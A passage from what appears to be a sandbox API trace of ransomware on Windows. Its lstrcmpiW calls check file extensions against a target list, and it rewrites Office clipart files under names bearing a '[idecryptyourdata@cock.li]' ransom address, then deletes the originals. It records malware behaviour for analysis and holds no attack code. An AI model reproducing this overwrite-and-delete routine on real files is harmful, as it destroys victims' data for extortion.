Office\\root\\CLIPART\\PUB60COR\\FD00336_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00336_.wmf")) returned 1 [0065.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00336_.WMF") returned 68 [0065.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00336_.WMF") returned 68 [0065.991] lstrlenW (lpString=".doc") returned 4 [0065.991] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.991] lstrlenW (lpString=".docx") returned 5 [0065.991] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.991] lstrlenW (lpString=".pdf") returned 4 [0065.991] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.991] lstrlenW (lpString=".xls") returned 4 [0065.991] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.991] lstrlenW (lpString=".xlsx") returned 5 [0065.991] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.991] lstrlenW (lpString=".ppt") returned 4 [0065.991] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00336_.WMF") returned 68 [0065.991] lstrlenW (lpString=".zip") returned 4 [0065.991] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.991] lstrlenW (lpString=".rar") returned 4 [0065.991] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.991] lstrlenW (lpString=".bz2") returned 4 [0065.991] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.991] lstrlenW (lpString=".7z") returned 3 [0065.991] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00336_.WMF") returned 68 [0065.991] lstrlenW (lpString=".dbf") returned 4 [0065.991] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00336_.WMF") returned 68 [0065.992] lstrlenW (lpString=".1cd") returned 4 [0065.992] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00336_.WMF") returned 68 [0065.992] lstrlenW (lpString=".jpg") returned 4 [0065.992] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.992] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.992] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.992] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00397_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00397_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0065.993] GetLastError () returned 0x0 [0065.993] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x2a40, lpOverlapped=0x0) returned 1 [0066.132] WriteFile (in: hFile=0x2c0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x2a50, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x2a50, lpOverlapped=0x0) returned 1 [0066.133] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0066.133] WriteFile (in: hFile=0x2c0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0066.133] SetEndOfFile (hFile=0x2c0) returned 1 [0066.136] CloseHandle (hObject=0x2c0) returned 1 [0066.136] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.136] SetEndOfFile (hFile=0x354) returned 1 [0066.140] CloseHandle (hObject=0x354) returned 1 [0066.140] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00397_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.141] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00397_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00397_.wmf")) returned 1 [0066.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00397_.WMF") returned 68 [0066.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00397_.WMF") returned 68 [0066.141] lstrlenW (lpString=".doc") returned 4 [0066.141] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.141] lstrlenW (lpString=".docx") returned 5 [0066.141] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.141] lstrlenW (lpString=".pdf") returned 4 [0066.141] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.141] lstrlenW (lpString=".xls") returned 4 [0066.141] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.141] lstrlenW (lpString=".xlsx") returned 5 [0066.141] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.141] lstrlenW (lpString=".ppt") returned 4 [0066.141] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00397_.WMF") returned 68 [0066.141] lstrlenW (lpString=".zip") returned 4 [0066.141] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.141] lstrlenW (lpString=".rar") returned 4 [0066.142] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.142] lstrlenW (lpString=".bz2") returned 4 [0066.142] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.142] lstrlenW (lpString=".7z") returned 3 [0066.142] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00397_.WMF") returned 68 [0066.142] lstrlenW (lpString=".dbf") returned 4 [0066.142] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00397_.WMF") returned 68 [0066.142] lstrlenW (lpString=".1cd") returned 4 [0066.142] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00397_.WMF") returned 68 [0066.142] lstrlenW (lpString=".jpg") returned 4 [0066.142] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.143] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.143] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.143] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00428_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00428_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0066.144] GetLastError () returned 0x0 [0066.144] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x12bc, lpOverlapped=0x0) returned 1 [0066.254] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x12c0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x12c0, lpOverlapped=0x0) returned 1 [0066.255] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0066.255] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0066.255] SetEndOfFile (hFile=0x340) returned 1 [0066.255] CloseHandle (hObject=0x340) returned 1 [0066.255] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.255] SetEndOfFile (hFile=0x354) returned 1 [0066.256] CloseHandle (hObject=0x354) returned 1 [0066.256] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00428_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.256] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00428_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00428_.wmf")) returned 1 [0066.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00428_.WMF") returned 68 [0066.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00428_.WMF") returned 68 [0066.257] lstrlenW (lpString=".doc") returned 4 [0066.257] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.257] lstrlenW (lpString=".docx") returned 5 [0066.257] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.257] lstrlenW (lpString=".pdf") returned 4 [0066.257] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.257] lstrlenW (lpString=".xls") returned 4 [0066.257] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.257] lstrlenW (lpString=".xlsx") returned 5 [0066.257] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.257] lstrlenW (lpString=".ppt") returned 4 [0066.257] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00428_.WMF") returned 68 [0066.257] lstrlenW (lpString=".zip") returned 4 [0066.257] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.257] lstrlenW (lpString=".rar") returned 4 [0066.257] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.257] lstrlenW (lpString=".bz2") returned 4 [0066.257] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.257] lstrlenW (lpString=".7z") returned 3 [0066.257] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00428_.WMF") returned 68 [0066.258] lstrlenW (lpString=".dbf") returned 4 [0066.258] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.258] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00428_.WMF") returned 68 [0066.258] lstrlenW (lpString=".1cd") returned 4 [0066.258] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.258] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00428_.WMF") returned 68 [0066.258] lstrlenW (lpString=".jpg") returned 4 [0066.258] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.258] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.258] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.258] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00435_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00435_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0066.258] GetLastError () returned 0x0 [0066.258] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x83c, lpOverlapped=0x0) returned 1 [0066.271] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x840, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x840, lpOverlapped=0x0) returned 1 [0066.272] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0066.272] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0066.272] SetEndOfFile (hFile=0x340) returned 1 [0066.272] CloseHandle (hObject=0x340) returned 1 [0066.272] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.272] SetEndOfFile (hFile=0x354) returned 1 [0066.273] CloseHandle (hObject=0x354) returned 1 [0066.273] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00435_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.273] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00435_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00435_.wmf")) returned 1 [0066.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00435_.WMF") returned 68 [0066.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00435_.WMF") returned 68 [0066.283] lstrlenW (lpString=".doc") returned 4 [0066.283] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.283] lstrlenW (lpString=".docx") returned 5 [0066.283] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.284] lstrlenW (lpString=".pdf") returned 4 [0066.284] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.284] lstrlenW (lpString=".xls") returned 4 [0066.284] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.284] lstrlenW (lpString=".xlsx") returned 5 [0066.284] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.284] lstrlenW (lpString=".ppt") returned 4 [0066.284] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00435_.WMF") returned 68 [0066.284] lstrlenW (lpString=".zip") returned 4 [0066.284] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.284] lstrlenW (lpString=".rar") returned 4 [0066.284] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.284] lstrlenW (lpString=".bz2") returned 4 [0066.284] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.284] lstrlenW (lpString=".7z") returned 3 [0066.284] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00435_.WMF") returned 68 [0066.284] lstrlenW (lpString=".dbf") returned 4 [0066.284] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00435_.WMF") returned 68 [0066.284] lstrlenW (lpString=".1cd") returned 4 [0066.284] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00435_.WMF") returned 68 [0066.284] lstrlenW (lpString=".jpg") returned 4 [0066.284] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.309] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.309] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.309] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00459_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00459_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0066.311] GetLastError () returned 0x0 [0066.311] ReadFile (in: hFile=0x2c8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x43fe, lpOverlapped=0x0) returned 1 [0066.316] WriteFile (in: hFile=0x384, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x4400, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x4400, lpOverlapped=0x0) returned 1 [0066.317] ReadFile (in: hFile=0x2c8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0066.317] WriteFile (in: hFile=0x384, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0066.317] SetEndOfFile (hFile=0x384) returned 1 [0066.331] CloseHandle (hObject=0x384) returned 1 [0066.331] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.331] SetEndOfFile (hFile=0x2c8) returned 1 [0066.332] CloseHandle (hObject=0x2c8) returned 1 [0066.332] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00459_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.332] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00459_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00459_.wmf")) returned 1 [0066.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00459_.WMF") returned 68 [0066.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00459_.WMF") returned 68 [0066.333] lstrlenW (lpString=".doc") returned 4 [0066.333] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.333] lstrlenW (lpString=".docx") returned 5 [0066.333] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.333] lstrlenW (lpString=".pdf") returned 4 [0066.333] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.333] lstrlenW (lpString=".xls") returned 4 [0066.333] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.333] lstrlenW (lpString=".xlsx") returned 5 [0066.333] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.333] lstrlenW (lpString=".ppt") returned 4 [0066.333] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00459_.WMF") returned 68 [0066.333] lstrlenW (lpString=".zip") returned 4 [0066.333] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.333] lstrlenW (lpString=".rar") returned 4 [0066.333] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.333] lstrlenW (lpString=".bz2") returned 4 [0066.333] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.333] lstrlenW (lpString=".7z") returned 3 [0066.333] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00459_.WMF") returned 68 [0066.333] lstrlenW (lpString=".dbf") returned 4 [0066.334] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00459_.WMF") returned 68 [0066.334] lstrlenW (lpString=".1cd") returned 4 [0066.334] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00459_.WMF") returned 68 [0066.334] lstrlenW (lpString=".jpg") returned 4 [0066.334] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.336] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.336] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.336] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00586_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00586_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0066.338] GetLastError () returned 0x0 [0066.338] ReadFile (in: hFile=0x384, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x2f0, lpOverlapped=0x0) returned 1 [0066.381] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x300, lpOverlapped=0x0) returned 1 [0066.382] ReadFile (in: hFile=0x384, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0066.382] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0066.382] SetEndOfFile (hFile=0x340) returned 1 [0066.389] CloseHandle (hObject=0x340) returned 1 [0066.390] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.390] SetEndOfFile (hFile=0x384) returned 1 [0066.392] CloseHandle (hObject=0x384) returned 1 [0066.393] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00586_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.394] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00586_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00586_.wmf")) returned 1 [0066.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00586_.WMF") returned 68 [0066.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00586_.WMF") returned 68 [0066.394] lstrlenW (lpString=".doc") returned 4 [0066.394] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.394] lstrlenW (lpString=".docx") returned 5 [0066.394] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.394] lstrlenW (lpString=".pdf") returned 4 [0066.394] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.394] lstrlenW (lpString=".xls") returned 4 [0066.394] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.394] lstrlenW (lpString=".xlsx") returned 5 [0066.395] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.395] lstrlenW (lpString=".ppt") returned 4 [0066.395] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.395] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00586_.WMF") returned 68 [0066.395] lstrlenW (lpString=".zip") returned 4 [0066.395] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.395] lstrlenW (lpString=".rar") returned 4 [0066.395] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.395] lstrlenW (lpString=".bz2") returned 4 [0066.395] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.395] lstrlenW (lpString=".7z") returned 3 [0066.395] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.395] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00586_.WMF") returned 68 [0066.395] lstrlenW (lpString=".dbf") returned 4 [0066.395] lstrcmpiW (lpString1=".dbf", 